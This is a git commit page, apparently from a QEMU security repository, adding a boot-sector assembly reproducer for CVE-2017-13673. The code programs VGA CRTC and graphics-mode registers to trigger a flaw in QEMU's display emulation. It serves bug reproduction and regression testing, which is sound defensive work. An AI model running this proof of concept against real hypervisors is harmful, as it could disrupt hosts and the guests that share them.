diff options
| author | Gerd Hoffmann <kraxel@redhat.com> | 2017-08-30 15:54:02 +0200 |
|---|---|---|
| committer | Gerd Hoffmann <kraxel@redhat.com> | 2017-08-30 15:54:24 +0200 |
| commit | 2339ec544399cd66930643817ba1cb1094ddccfa (patch) | |
| tree | 1a4f3edf18b81f1b628bdea7e1ddd9910f6bd9ef /boot-cve-2017-13673.asm | |
| parent | 1808bb759313e69205f828d49fe9ffbcb1859377 (diff) | |
| download | qemu-security-2339ec544399cd66930643817ba1cb1094ddccfa.tar.gz | |
add cve-2017-13672 + cve-2017-13673 reproducers
Diffstat (limited to 'boot-cve-2017-13673.asm')
| -rw-r--r-- | boot-cve-2017-13673.asm | 51 |
1 files changed, 51 insertions, 0 deletions
diff --git a/boot-cve-2017-13673.asm b/boot-cve-2017-13673.asm new file mode 100644 index 0000000..21d5f3d --- /dev/null +++ b/boot-cve-2017-13673.asm @@ -0,0 +1,51 @@ +; From: David Buchanan <d@vidbuchanan.co.uk>
+;
+; compiles to boot sector, pass as disk to qemu to run the code.
+;
+
+ BITS 16
+
+ ORG 0x7C00
+
+ mov dx, 0x3d4 ; start_addr high byte
+ mov al, 0x0c
+ out dx, al
+
+ mov dx, 0x3d5
+ mov al, 0xff
+ out dx, al
+
+
+ mov dx, 0x3d4 ; line_compare
+ mov al, 0x07
+ out dx, al
+
+ mov dx, 0x3d5
+ in al, dx
+ and al, ~0x10
+ out dx, al
+
+
+ mov dx, 0x3d4 ; line_compare
+ mov al, 0x09
+ out dx, al
+
+ mov dx, 0x3d5
+ in al, dx
+ and al, ~0x40
+ out dx, al
+
+
+ mov dx, 0x3ce ; gfx mode
+ mov al, 0x06
+ out dx, al
+
+ mov dx, 0x3cf
+ mov al, 0x01
+ out dx, al
+
+
+ jmp $
+
+ TIMES 510-($-$$) DB 0
+ DW 0xAA55 ; boot signature
|